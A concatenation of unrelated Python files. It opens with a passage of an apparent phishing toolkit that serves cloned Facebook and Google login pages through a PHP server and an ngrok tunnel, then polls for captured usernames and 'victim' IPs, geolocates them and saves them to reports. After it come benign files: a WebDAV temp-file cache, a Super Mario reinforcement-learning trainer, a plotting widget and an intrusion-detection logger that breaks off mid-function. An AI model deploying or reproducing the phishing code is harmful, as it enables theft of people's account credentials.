else:
self.dirk: str = str(sp.getoutput('pwd'))
if ("/Phishing" not in self.dirk):
self.dirk += "/Phishing"
def check_need(self):
try:
if 256 != system('which php > /dev/null'):
print("PHP INSTALLATION FOUND")
else:
print("{ PHP NOT FOUND: \n Please install PHP and run me again.http://www.php.net/")
exit()
except:
if 256 != system('where php'):
print("PHP INSTALLATION FOUND")
else:
print("{ PHP NOT FOUND: \n Please install PHP and run me again.http://www.php.net/")
exit()
try:
is_admin = os.getuid() == 0
except AttributeError:
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if (is_admin):
print("good")
else:
print("run with root,Administrator permission")
exit()
def runPhishing(self,page, customOption,dirk):
if "nt" in os.name:
system('powershell rm -Force ' + dirk + '\\Server\\www\\*.* && powershell rm -Force ' + dirk + '\\Server\\www\\* && copy '
+ dirk + '\\WebPages\\ip.php ' + dirk + '\\Server\\www\\ && copy '
+ dirk + '\\Server\\CapturedData\\login.php ' + dirk + '\\Server\\www\\ && echo 1> ' + dirk + '\\Server\\www\\usernames.txt && echo 1 > ' + dirk + '\\Server\\www\\ip.txt')
print("jjj",dirk)
if customOption == '1' and page == 'Facebook':
system("powershell copy -r " + dirk + "\\WebPages\\fb_standard\\* " + dirk + "\\Server\\www\\")
elif customOption == '2' and page == 'Facebook':
system("powershell copy -r " + dirk + "\\WebPages\\fb_advanced_poll\\* " + dirk + "\\Server\\www\\")
elif customOption == '3' and page == 'Facebook':
system("powershell copy -r " + dirk + "\\WebPages\\fb_security_fake\\* " + dirk + "\\Server\\www\\")
elif customOption == '4' and page == 'Facebook':
system("powershell copy -r " + dirk + "\\WebPages\\fb_messenger\\* " + dirk + "\\Server\\www\\")
elif customOption == '1' and page == 'Google':
system("powershell copy -r " + dirk + "\\WebPages\\google_standard\\* " + dirk + "\\Server\\www\\")
elif customOption == '2' and page == 'Google':
system("powershell copy -r " + dirk + "\\WebPages\\google_advanced_poll\\* " + dirk + "\\Server\\www\\")
elif customOption == '3' and page == 'Google':
system("powershell copy -r " + dirk + "\\WebPages\\google_advanced_web\\* " + dirk + "\\Server\\www\\")
else:
system(
'rm -Rf ' + dirk + '/Server/www/*.* && cp ' + dirk + '/WebPages/ip.php ' + dirk + '/Server/www/ && cp ' + dirk + '/Server/CapturedData/login.php ' + dirk + '/Server/www/ && echo > ' + dirk + '/Server/www/usernames.txt && echo > ' + dirk + '/Server/www/ip.txt')
print("jjj", dirk)
if customOption == '1' and page == 'Facebook':
system("cp -r " + dirk + "/WebPages/fb_standard/* " + dirk + "/Server/www/")
elif customOption == '2' and page == 'Facebook':
system("cp -r " + dirk + "/WebPages/fb_advanced_poll/* " + dirk + "/Server/www/")
elif customOption == '3' and page == 'Facebook':
system("cp -r " + dirk + "/WebPages/fb_security_fake/* " + dirk + "/Server/www/")
elif customOption == '4' and page == 'Facebook':
system("cp -r " + dirk + "/WebPages/fb_messenger/* " + dirk + "/Server/www/")
elif customOption == '1' and page == 'Google':
system("cp -r " + dirk + "/WebPages/google_standard/* " + dirk + "/Server/www/")
elif customOption == '2' and page == 'Google':
system("cp -r " + dirk + "/WebPages/google_advanced_poll/* " + dirk + "/Server/www/")
elif customOption == '3' and page == 'Google':
system("cp -r " + dirk + "/WebPages/google_advanced_web/* " + dirk + "/Server/www/")
def mainMenu(self):
if "nt" in os.name:
system('cls')
pass
else:
system('clear')
print("------------------------SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:------------------------")
print("""-1 Facebook\n-2Google""")
option = input("SCPT >>> ")
if option == '1':
customOption = input(
"\nOperation mode:\nStandard Page Phishing\n1 Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n2 Facebook Phishing- Fake Security issue(security_mode) \n3 Facebook Phising-Messenger Credentials(messenger_mode) \nSCPT >>> ")
self.runPhishing('Facebook', customOption,self.dirk)
elif option == '2':
customOption = input(
"\nOperation mode:\n Standard Page Phishing\n1 Advanced Phishing(poll_mode/login_with)\n2 New Google Web\nscpt >>> ")
self.runPhishing('Google', customOption,self.dirk)
def inputCustom(self,custom,dirk):
if 'http://' in custom or 'https://' in custom:
pass
else:
custom = 'http://' + custom
if "nt" in os.name:
with open(dirk + '\\Server\\www\\login.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open(dirk + '\\Server\\www\\login.php', 'w')
f.write(c)
f.close()
else:
with open(dirk + '/Server/www/login.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open(dirk + '/Server/www/login.php', 'w')
f.write(c)
f.close()
def runServer(self,port):
if "nt" in os.name:
system("powershell Stop-Process -Id (Get-NetTCPConnection -LocalPort %s).OwningProcess -Force " % (port))
system("cd " + self.dirk + "\\Server\\www\\ && powershell Start-Process -NoNewWindow powershell 'php -S 127.0.0.1:%s' " % (port))
else:
system("fuser -k %s/tcp > /dev/null 2>&1" % (port))
system("cd " + self.dirk + "/Server/www/ && php -S 127.0.0.1:%s > /dev/null 2>&1 &" % (port))
def runNgrok(self,port,dirk):
if "nt" in os.name:
system("powershell Start-Process -NoNewWindow powershell '"+dirk + "\\.\\Server\\ngrok http {} ' ".format(port))
time.sleep(3)
# system("powershell Invoke-WebRequest -Uri http://localhost:4040/api/tunnels -UseBasicParsing > " + dirk + "\\tunnels.json")
system("curl http://localhost:4040/api/tunnels > " + dirk + "\\tunnels.json")
with open(dirk + '\\tunnels.json') as data_file:
datajson = json.load(data_file)
msg = "ngrok URL's: \n"
for i in datajson['tunnels']:
msg = msg + i['public_url'] + '\n'
return msg
else:
system("chmod +x "+dirk + '/./Server/ngrok ')
system(dirk + '/./Server/ngrok http {} > /dev/null &'.format(port))
time.sleep(3)
# """ curl --silent --show-error http://127.0.0.1:4040/api/tunnels | sed -nE 's/.*public_url":"https:..([^"]*).*/\1/p' """
system("curl http://localhost:4040/api/tunnels > " + dirk + "/tunnels.json")
with open(dirk + '/tunnels.json') as data_file:
datajson = json.load(data_file)
msg = "ngrok URL's: \n"
for i in datajson['tunnels']:
msg = msg + i['public_url'] + '\n'
return msg
def getCredentials(self):
print(
" Waiting For Victim Interaction. Keep Eyes On Requests Coming From Victim ... \n"
"________________________________________________________________________________\n")
crides_nm = ""
crides_nm2 = ""
try:
date = str(datetime.today().strftime('%Y-%m-%d'))
if "nt" in os.name:
dirk2 = self.dirk.replace('\\Phishing', '\\Reports\\phishing\\')
diroping = self.dirk + '\\Server\\www\\usernames.txt'
diroping_ip = self.dirk + '\\Server\\www\\ip.txt'
else:
dirk2 = self.dirk.replace('/Phishing', '/Reports/phishing/')
diroping = self.dirk + '/Server/www/usernames.txt'
diroping_ip = self.dirk + '/Server/www/ip.txt'
while True:
with open(diroping) as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
if lines not in crides_nm2:
crides_nm2 += lines
print(lines)
with open(dirk2 + date + "_phishing.json", "a") as dop:
dop.write(lines)
dop.write("\n")
dop.close()
else:
pass
with open(diroping_ip) as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
ip = re.search("Victim Public IP: (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\n,\r]", lines).group(1)
resp = urlopen('https://ipinfo.io/{0}/json'.format(ip))
ipinfo = json.loads(resp.read().decode(
resp.info().get_param('charset') or 'utf-8'))
if 'bogon' in ipinfo:
print(' \n\n[ VICTIM IP BONUS ]\n {0}{2}{1}'.format(
lines))
if str(lines) not in crides_nm:
crides_nm += str(lines)
print(lines)
else:
pass
else:
pass
if str(ipinfo) not in crides_nm:
crides_nm += str(ipinfo)
print(ipinfo)
with open(dirk2 + date + "_phishing.json", "a") as dop:
dop.write(str(ipinfo))
dop.write("\n")
dop.close()
else:
pass
creds.close()
except:
pass
class GUI(QtCore.QThread):
Gui_Date_output = QtCore.pyqtSignal(object)
def __init__(self, port, customOption, pages_type,redk) -> None:
QtCore.QThread.__init__(self)
self.PHish = Phishing_cli()
self.port = port
self.customOption = customOption
self.pages_type = pages_type
self.redk = redk
if "nt" in os.name:
self.dirk: str = str(sp.getoutput('powershell pwd'))
self.dirk = self.dirk.replace(" ", "").replace("\r", "").replace("\n", "").replace("'", "").replace("Path", "").replace( "--", "")
if ("\\Phishing" not in self.dirk):
self.dirk += "\\Phishing"
else:
self.dirk: str = str(sp.getoutput('pwd'))
if ("/Phishing" not in self.dirk):
self.dirk += "/Phishing"
def getCredentials(self):
print(
" Waiting For Victim Interaction. Keep Eyes On Requests Coming From Victim ... \n"
"________________________________________________________________________________\n")
crides_nm = ""
crides_nm2 = ""
try:
date = str(datetime.today().strftime('%Y-%m-%d'))
if "nt" in os.name:
dirk2 = self.dirk.replace('\\Phishing', '\\Reports\\phishing\\')
dropingk = self.dirk + '\\Server\\www\\usernames.txt'
dropingips = self.dirk + '\\Server\\www\\ip.txt'
else:
dirk2 = self.dirk.replace('/Phishing', '/Reports/phishing/')
dropingk = self.dirk + '/Server/www/usernames.txt'
dropingips = self.dirk + '/Server/www/ip.txt'
while True:
with open(dropingk) as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
if lines not in crides_nm2:
crides_nm2 += lines
print(lines)
self.Gui_Date_output.emit(str(lines))
time.sleep(1)
QtCore.QCoreApplication.processEvents()
with open(dirk2 + date + "_phishing.json", "a") as dop:
dop.write(lines)
dop.write("\n")
dop.close()
else:
pass
with open(dropingips) as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
ip = re.search("Victim Public IP: (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\n,\r]",
lines).group(1)
resp = urlopen('https://ipinfo.io/{0}/json'.format(ip))
ipinfo = json.loads(resp.read().decode(
resp.info().get_param('charset') or 'utf-8'))
if 'bogon' in ipinfo:
print(' \n\n[ VICTIM IP BONUS ]\n {0}{2}{1}'.format(
lines))
if str(lines) not in crides_nm:
crides_nm += str(lines)
print(lines)
self.Gui_Date_output.emit(str(lines))
time.sleep(1)
QtCore.QCoreApplication.processEvents()
else:
pass
else:
pass
if str(ipinfo) not in crides_nm:
crides_nm += str(ipinfo)
print(ipinfo)
self.Gui_Date_output.emit(str(ipinfo))
time.sleep(1)
QtCore.QCoreApplication.processEvents()
with open(dirk2 + date + "_phishing.json", "a") as dop:
dop.write(str(ipinfo))
dop.write("\n")
dop.close()
else:
pass
creds.close()
except:
pass
def run(self) -> None:
self.PHish.check_need()
self.PHish.runPhishing(self.pages_type, self.customOption,self.dirk)
self.PHish.inputCustom(self.redk,self.dirk)
self.PHish.runServer(self.port)
url = self.PHish.runNgrok(self.port,self.dirk)
print(url)
self.Gui_Date_output.emit(str(url))
time.sleep(1)
QtCore.QCoreApplication.processEvents()
multiprocessing.Process(target=self.PHish.runServer, args=(self.port,)).start()
self.getCredentials()
if __name__ == '__main__':
try:
PHish = Phishing_cli()
PHish.check_need()
PHish.mainMenu()
if "nt" in os.name:
system('cls')
pass
else:
system('clear')
print('''\nChoose Wisely As Your Victim Will Redirect to This Link''')
print(
'''\nDo not leave it blank. Unless Errors may occur''')
print(
'''\nInsert a custom redirect url:''')
custom = str(input('''\nREDIRECT HERE>>> '''))
PHish.inputCustom(custom,PHish.dirk)
port = 56
PHish.runServer(port)
url = PHish.runNgrok(port,PHish.dirk)
print(url)
multiprocessing.Process(target=PHish.runServer, args=(port,)).start()
if "nt" in os.name:
while True:
PHish.getCredentials()
else:
PHish.getCredentials()
except KeyboardInterrupt:
if "nt" in os.name:
system('taskkill /IM "ngrok.exe" /F')
else:
system('sudo pkill ngrok')
exit()
|
ISSMDAVFileHandler.py | from datetime import *
import tempfile
import time
import threading
import os
class ISSMDAVFileHandler():
def __init__(self):
self.tempfile_list = {}
print("----------------------------------------------------")
t1 = threading.Thread(target = self.init_cache_watcher, args=())
t1.start()
print("----------------------------------------------------")
def init_cache_watcher(self):
while True:
self.checkCache()
time.sleep(10)
def checkCache(self):
print(f"checkCache -- {len(self.tempfile_list.keys())}")
one_minute_ago = datetime.now() - timedelta(minutes=1)
for search_hash, item in self.tempfile_list.copy().items():
print(f"search_hash: {search_hash}")
#check if item expire (after 60s)
if self.processCacheItem(item) or item['last_change_date'] < one_minute_ago:
self.clearCacheItem(search_hash)
def processCacheItem(self, cache_item):
if 'infos' in cache_item:
print(cache_item['infos'])
return True
return False
def clearCacheItem(self, search_hash):
temp_file = '/data/temp/' + search_hash
os.unlink(temp_file)
if search_hash in self.tempfile_list:
del self.tempfile_list[search_hash]
def calHash(self, path, user):
return "h_" + str(hash(path + str(user['id'])))
def getTempFileItem(self, path, user):
search_hash = self.calHash(path,user)
print(F"getTempFileItem: {search_hash} -- {len(self.tempfile_list.keys())}")
temp_file = None
if search_hash in self.tempfile_list:
temp_file = self.tempfile_list[search_hash]
return temp_file
return temp_file
def getTempFile(self, path, user):
temp_file = self.getTempFileItem(path, user)
if temp_file is not None:
return temp_file["temp_file"]
return temp_file
def getTempFileName(self, path, user):
temp_file = self.getTempFileItem(path, user)
if temp_file is not None:
return temp_file["name"]
return temp_file
def setTempFile(self, path, user, temp_file, name):
search_hash = self.calHash(path,user)
print(F"setTempFile: {search_hash}")
result_object = {
'temp_file': temp_file,
'last_change_date': datetime.now(),
'name': name
}
if search_hash in self.tempfile_list:
self.tempfile_list[search_hash] = result_object
else:
self.tempfile_list[search_hash] = result_object
return temp_file
def newTempFile(self, path, user, name):
search_hash = self.calHash(path,user)
temp_file = '/data/temp/' + search_hash
os.makedirs(os.path.dirname(temp_file), exist_ok=True)
return self.setTempFile(path, user,temp_file, name)
def removeTempFile(self, path, user, name):
search_hash = self.calHash(path,user)
return self.clearCacheItem(search_hash)
def addInformationToTempFile(self, path, user, information):
temp_file_item = self.getTempFileItem(path, user)
temp_file_item['infos'] = information
return temp_file_item
|
train.py | # Create by Packetsss
# Personal use is allowed
# Commercial use is prohibited
"""
@author: Viet Nguyen <nhviet1009@gmail.com>
"""
import os
os.environ['OMP_NUM_THREADS'] = '1'
import argparse
import torch
from src.env import create_train_env
from src.model import ActorCritic
from src.optimizer import GlobalAdam
from src.process import local_train, local_test
import torch.multiprocessing as _mp
import shutil
def get_args():
parser = argparse.ArgumentParser(
"""Implementation of model described in the paper: Asynchronous Methods for Deep Reinforcement Learning for Super Mario Bros""")
parser.add_argument("--world", type=int, default=1)
parser.add_argument("--stage", type=int, default=1)
parser.add_argument("--action_type", type=str, default="complex")
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gamma', type=float, default=0.9, help='discount factor for rewards')
parser.add_argument('--tau', type=float, default=1.0, help='parameter for GAE')
parser.add_argument('--beta', type=float, default=0.01, help='entropy coefficient')
parser.add_argument("--num_local_steps", type=int, default=50)
parser.add_argument("--num_global_steps", type=int, default=5e6)
parser.add_argument("--num_processes", type=int, default=6)
parser.add_argument("--save_interval", type=int, default=500, help="Number of steps between savings")
parser.add_argument("--max_actions", type=int, default=200, help="Maximum repetition steps in test phase")
parser.add_argument("--log_path", type=str, default="tensorboard/a3c_super_mario_bros")
parser.add_argument("--saved_path", type=str, default="trained_models")
parser.add_argument("--load_from_previous_stage", type=bool, default=False,
help="Load weight from previous trained stage")
parser.add_argument("--use_gpu", type=bool, default=True)
args = parser.parse_args()
return args
def train(opt):
torch.manual_seed(123)
if os.path.isdir(opt.log_path):
shutil.rmtree(opt.log_path)
os.makedirs(opt.log_path)
if not os.path.isdir(opt.saved_path):
os.makedirs(opt.saved_path)
mp = _mp.get_context("spawn")
env, num_states, num_actions = create_train_env(opt.world, opt.stage, opt.action_type)
global_model = ActorCritic(num_states, num_actions)
if opt.use_gpu:
global_model.cuda()
global_model.share_memory()
if opt.load_from_previous_stage:
if opt.stage == 1:
previous_world = opt.world - 1
previous_stage = 4
else:
previous_world = opt.world
previous_stage = opt.stage - 1
file_ = "{}/a3c_super_mario_bros_{}_{}".format(opt.saved_path, previous_world, previous_stage)
if os.path.isfile(file_):
global_model.load_state_dict(torch.load(file_))
optimizer = GlobalAdam(global_model.parameters(), lr=opt.lr)
processes = []
for index in range(opt.num_processes):
if index == 0:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer, True))
else:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer))
process.start()
processes.append(process)
process = mp.Process(target=local_test, args=(opt.num_processes, opt, global_model))
process.start()
processes.append(process)
for process in processes:
process.join()
if __name__ == "__main__":
opt = get_args()
train(opt)
|
CurvesView.py | # coding: utf-8
# /*##########################################################################
#
# Copyright (c) 2017 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ###########################################################################*/
"""
Widget displaying the synthesis of many curves taken with the same X values
"""
from __future__ import division
__authors__ = ["T. VINCENT"]
__license__ = "MIT"
__date__ = "30/05/2017"
import logging
import numpy
from silx.gui import qt
from silx.gui.plot import Plot1D
_logger = logging.getLogger(__name__)
if hasattr(numpy, "nanmean"):
nanmean = numpy.nanmean
else: # Debian 7 support
def nanmean(data, axis=None):
"""Compute mean of none NaN elements
:param numpy.ndarray data: The array to process
:param axis: None or the axis index along which to compute the means.
"""
notNaNMask = numpy.logical_not(numpy.isnan(data))
return numpy.nansum(data, axis) / numpy.sum(notNaNMask, axis, dtype="int")
# TODO make the min/max background work for negative values...
# TODO split control widgets from curves plot
# TODO make curves handling not being a widget and make it interact with a plot
# TODO optimisation of min/mean/max computation
# TODO optimisation of plotting: no update curves when not in live mode
# TODO optimisation of plotting: no update of background when not 'visible' change
# TODO add std? in background
# TODO error bars of current curves
# TODO set number of curves displayed
# TODO matplotlib bad rendering of filled curves regarding edges
# TODO OO API with setters
class CurvesView(qt.QWidget):
"""Widget displaying statistical indicators over many curves
:param parent:
:param f:
"""
_sigAppendCurves = qt.Signal(object)
_sigSetXData = qt.Signal(object)
def __init__(self, parent=None, f=qt.Qt.WindowFlags()):
super(CurvesView, self).__init__(parent, f)
self._nbExtraCurves = 1
self._currentCurveColor = 0.0, 0.8, 0.0, 1.0
self._index = -1
self._x = None
self._data = None
self._min = None
self._max = None
self._sum = None
self._count = None
self._plot = Plot1D() # backend='matplotlib')
self._plot.setActiveCurveHandling(False)
layout = qt.QGridLayout(self)
layout.setContentsMargins(0, 0, 0, 0)
layout.setSpacing(0)
layout.addWidget(self._plot, 0, 0, 1, 2)
self._slider = qt.QSlider(qt.Qt.Horizontal)
layout.addWidget(self._slider, 1, 0)
self._spinBox = qt.QSpinBox()
layout.addWidget(self._spinBox, 1, 1)
self._slider.valueChanged.connect(self._indexChanged)
self._spinBox.valueChanged.connect(self._indexChanged)
self._updateControlWidgets()
self._sigAppendCurves.connect(self._appendCurves)
self._sigSetXData.connect(self._setXData)
def getPlot(self):
"""Returns the used :class:`PlotWidget` plot."""
return self._plot
def setXData(self, x):
"""Set the X coordinates of the curves.
This method can be called from any thread.
:param numpy.ndarray x: The X coordinates of the curves.
"""
x = numpy.array(x, copy=True)
assert x.ndim == 1
self._sigSetXData.emit(x)
def _setXData(self, x):
"""Implements :meth:`setXData` in the main thread."""
if self._data is not None:
assert len(x) == self._data.shape[-1]
self._x = x
def getXData(self):
"""Returns the X coordiantes of the curves(numpy.ndarray)"""
return numpy.array(self._x, copy=True)
def clear(self):
"""Reset the plot by removing all curves"""
self._data = None
self._min = None
self._max = None
self._sum = None
self._count = None
self.getPlot().clear()
self.setCurrentCurveIndex(-1)
self._updateControlWidgets()
def _updateCurrentCurve(self):
"""Update the current curve in the plot"""
plot = self.getPlot()
data = self.getData(copy=False)
currentIndex = self.getCurrentCurveIndex(absolute=True)
for offset in range(-self._nbExtraCurves, self._nbExtraCurves + 1):
index = currentIndex + offset
if offset == 0:
continue
legend = "N%+d" % offset
plot.remove(legend=legend, kind="curve")
if 0 <= index < len(data):
distance = abs(offset) / (self._nbExtraCurves + 1)
if abs(offset) == 1: # first curve
linestyle = "-"
elif distance < 0.66:
linestyle = "--"
else:
linestyle = ":"
if offset < 0:
color = numpy.array(self._currentCurveColor) * 0.5
else:
color = "#FF9900"
plot.addCurve(
self.getXData(),
data[index],
legend=legend,
color=color,
linestyle=linestyle,
z=100,
resetzoom=False,
)
# Current curve
if currentIndex < len(data):
currentCurve = data[currentIndex]
plot.addCurve(
self.getXData(),
currentCurve,
legend="current",
color=self._currentCurveColor,
z=101,
linewidth=2,
resetzoom=False,
)
else:
plot.remove(legend="current", kind="curve")
def _indexChanged(self, index):
"""Handle spinBox or slider value changed"""
currentIndex = self.getCurrentCurveIndex(absolute=True)
if currentIndex != index:
# Do not update index if it is already OK
self.setCurrentCurveIndex(index)
elif index == len(self.getData(copy=False)) - 1:
# Set to last curve
self.setCurrentCurveIndex(-1)
def setCurrentCurveIndex(self, index=-1):
"""Perform update when current curve changed
:param int index:
The index of the current curve in the array
The index can be negative to start indexing from the end
Default: -1 = Lastest curve.
"""
data = self.getData(copy=False)
assert index in (-1, 0) or -len(data) <= index < len(data)
self._index = index
if self._index < 0:
absoluteIndex = len(data) + self._index
else:
absoluteIndex = self._index
self._spinBox.setValue(absoluteIndex)
self._slider.setValue(absoluteIndex)
self._updateCurrentCurve()
def getCurrentCurveIndex(self, absolute=False):
"""Returns the current curve index
:param bool absolute:
False (default) to get index as Python indexing (can be negative),
True to get current index from the beginning of the data array (>= 0).
:return: The index
:rtype: int
"""
if absolute and self._index < 0: # Negative index is from the end
return max(0, len(self.getData(copy=False)) + self._index)
else:
return self._index
def _updateControlWidgets(self):
"""Update widgets controlling """
nbCurves = len(self.getData(copy=False))
if self.getCurrentCurveIndex() >= 0:
index = nbCurves - 1
else:
index = nbCurves + self.getCurrentCurveIndex()
self._slider.setRange(0, index)
self._spinBox.setRange(0, index)
self._slider.setEnabled(nbCurves > 0)
self._spinBox.setEnabled(nbCurves > 0)
self.setCurrentCurveIndex(self.getCurrentCurveIndex())
def getData(self, copy=True):
"""Return displayed curves data
:param bool copy: True to get a copy (default),
False to get internal representation, do not modify.
:return: A copy of the data currently displayed
"""
if self._data is None:
return numpy.array(()).reshape(0, 0) # Empty 2D array
else:
return numpy.array(self._data, copy=copy)
def appendCurves(self, data):
"""Add curve(s) to the plot.
The data is always copied.
This method can be called from any thread.
:param numpy.ndarray data:
If 1D, it is a curve to append to the plot.
If 2D, it is a set of curves to append.
"""
data = numpy.atleast_2d(numpy.array(data, copy=True))
assert data.ndim == 2
self._sigAppendCurves.emit(data)
def _appendCurves(self, data):
"""Implements :meth:`appendCurves` in the main thread."""
plot = self.getPlot()
wasData = self._data is not None
if self._data is None:
if self._x is None:
self._x = numpy.arange(data.shape[-1])
assert len(self._x) == data.shape[-1]
self._data = data
else:
assert self._data.shape[-1] == data.shape[-1]
self._data = numpy.append(self._data, data, axis=0)
self._updateControlWidgets()
# Update plot background
z = 1
maxs = numpy.nanmax(self._data, axis=0)
plot.addCurve(
self.getXData(),
maxs,
legend="maximum",
color="#D0D0D0",
fill=True,
z=z,
linestyle="-",
resetzoom=False,
)
z += 1
mins = numpy.nanmin(self._data, axis=0)
plot.addCurve(
self.getXData(),
mins,
legend="minimum",
color="#FFFFFF",
fill=True,
z=z,
linestyle="-",
resetzoom=False,
)
z += 1
means = nanmean(self._data, axis=0)
plot.addCurve(
self.getXData(),
means,
legend="mean",
color="#FFFFFF80",
linewidth=2,
linestyle="-",
z=1000,
resetzoom=False,
)
# Draw current curve
self._updateCurrentCurve()
if not wasData:
self.resetZoom()
def resetZoom(self):
"""Reset Plot zoom"""
self.getPlot().resetZoom()
if __name__ == "__main__":
import glob
import threading
import time
# dummy data
x = numpy.linspace(0.0, 10.0, 1024)
y = numpy.sin(x) + 2
data = y[numpy.newaxis, :] + numpy.random.normal(0, 0.1, (1024, len(y)))
app = qt.QApplication([])
w = CurvesView()
# w.setAttribute(qt.Qt.WA_DeleteOnClose)
w.show()
w.setXData(x)
w.appendCurves(data)
w.resetZoom()
running = True
def addCurves():
index = 0
while running:
time.sleep(0.5)
w.appendCurves(data[index % len(data)])
index += 1
thread = threading.Thread(target=addCurves)
thread.start()
app.exec_()
print("closing...")
if thread:
running = False
thread.join(2)
|
log.py | #!/usr/bin/env python
"""
Copyright (c) 2020 NIDDS developers (https://github.com/prasanthc41m/nidds/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function
import datetime
import os
import re
import signal
import socket
import sys
import threading
import time
import traceback
from core.common import check_whitelisted
from core.common import check_sudo
from core.compat import xrange
from core.enums import TRAIL
from core.settings import CEF_FORMAT
from core.settings import config
from core.settings import CONDENSE_ON_INFO_KEYWORDS
from core.settings import CONDENSED_EVENTS_FLUSH_PERIOD
from core.settings import DEFAULT_ERROR_LOG_PERMISSIONS
from core.settings import DEFAULT_EVENT_LOG_PERMISSIONS
from core.settings import HOSTNAME
from core.settings import NAME
from core.settings import TIME_FORMAT
from core.settings import UNICODE_ENCODING
from core.settings import VERSION
from core.ignore import ignore_event
from thirdparty.six.moves import socketserver as _socketserver
_condensed_events = {}
_condensing_thread = None
_condensing_lock = threading.Lock()
_single_messages = set()
_thread_data = threading.local()
def create_log_directory():
if not os.path.isdir(config.LOG_DIR):
if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
exit("[!] please rerun with sudo/Administrator privileges")
os.makedirs(config.LOG_DIR, 0o755)
print("[i] using '%s' for log storage" % config.LOG_DIR)
def get_event_log_handle(sec, flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY, reuse=True):
retval = None
localtime = time.localtime(sec)
_ = os.path.join(config.LOG_DIR, "%d-%02d-%02d.log" % (localtime.tm_year, localtime.tm_mon, localtime.tm_mday))
if not reuse:
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)
retval = os.open(_, flags)
else:
if _ != getattr(_thread_data, "event_log_path", None):
if getattr(_thread_data, "event_log_handle", None):
try:
os.close(_thread_data.event_log_handle)
except OSError:
pass
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)
_thread_data.event_log_path = _
_thread_data.event_log_handle = os.open(_thread_data.event_log_path, flags)
retval = _thread_data.event_log_handle
return retval
def get_error_log_handle(flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY):
if not hasattr(_thread_data, "error_log_handle"):
_ = os.path.join(config.get("LOG_DIR") or os.curdir, "error.log")
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_ERROR_LOG_PERMISSIONS)
_thread_data.error_log_path = _
_thread_data.error_log_handle = os.open(_thread_data.error_log_path, flags)
return _thread_data.error_log_handle
def safe_value(value):
retval = str(value or '-')
if any(_ in retval for _ in (' ', '"')):
retval = "\"%s\"" % retval.replace('"', '""')
retval = re.sub(r"[\x0a\x0d]", " ", retval)
return retval
def flush_condensed_events(single=False):
while True:
if not single:
time.sleep(CONDENSED_EVENTS_FLUSH_PERIOD)
with _condensing_lock:
for key in _condensed_events:
condensed = False
events = _condensed_events[key]
first_event = events[0]
condensed_event = [_ for _ in first_event]
for i in xrange(1, len(events)):
current_event = events[i]
for j in xrange(3, 7): # src_port, dst_ip, dst_port, proto
if current_event[j] != condensed_event[j]:
condensed = True
if not isinstance(condensed_event[j], set):
condensed_event[j] = set((condensed_event[j],))
condensed_event[j].add(current_event[j])
if condensed:
for i in xrange(len(condensed_event)):
if isinstance(condensed_event[i], set):
condensed_event[i] = ','.join(str(_) for _ in sorted(condensed_event[i]))
log_event(condensed_event, skip_condensing=True)
_condensed_events.clear()
if single:
break
def log_event(event_tuple, packet=None, skip_write=False, skip_condensing=False):
global _condensing_thread
if _condensing_thread is None:
_condensing_thread = threading.Thread(target=flush_condensed_events)
_condensing_thread.daemon = True
_condensing_thread.start()
try:
sec, usec, src_ip, src_port, dst_ip, dst_port, proto, trail_type, trail, info, reference = event_tuple
if ignore_event(event_tuple):
return
if not (any(check_whitelisted(_) for _ in (src_ip, dst_ip)) and trail_type != TRAIL.DNS): # DNS requests/responses can't be whitelisted based on src_ip/dst_ip
if not skip_write:
localtime = "%s.%06d" % (time.strftime(TIME_FORMAT, time.localtime(int(sec))), usec)
if not skip_condensing:
if any(_ in info for _ in CONDENSE_ON_INFO_KEYWORDS):
with _condensing_lock:
key = (src_ip, trail)
if key not in _condensed_events:
_condensed_events[key] = []
_condensed_events[key].append(event_tuple)
return
current_bucket = sec // config.PROCESS_COUNT
if getattr(_thread_data, "log_bucket", None) != current_bucket: # log throttling
_thread_data.log_bucket = current_bucket
_thread_data.log_trails = set()
else:
if any(_ in _thread_data.log_trails for _ in ((src_ip, trail), (dst_ip, trail))):
return
else:
_thread_data.log_trails.add((src_ip, trail))
_thread_data.log_trails.add((dst_ip, trail))
event = "%s %s %s\n" % (safe_value(localtime), safe_value(config.SENSOR_NAME), " ".join(safe_value(_) for _ in event_tuple[2:]))
if not config.DISABLE_LOCAL_LOG_STORAGE:
handle = get_event_log_handle(sec)
os.write(handle, event.encode(UNICODE_ENCODING))
if config.LOG_SERVER:
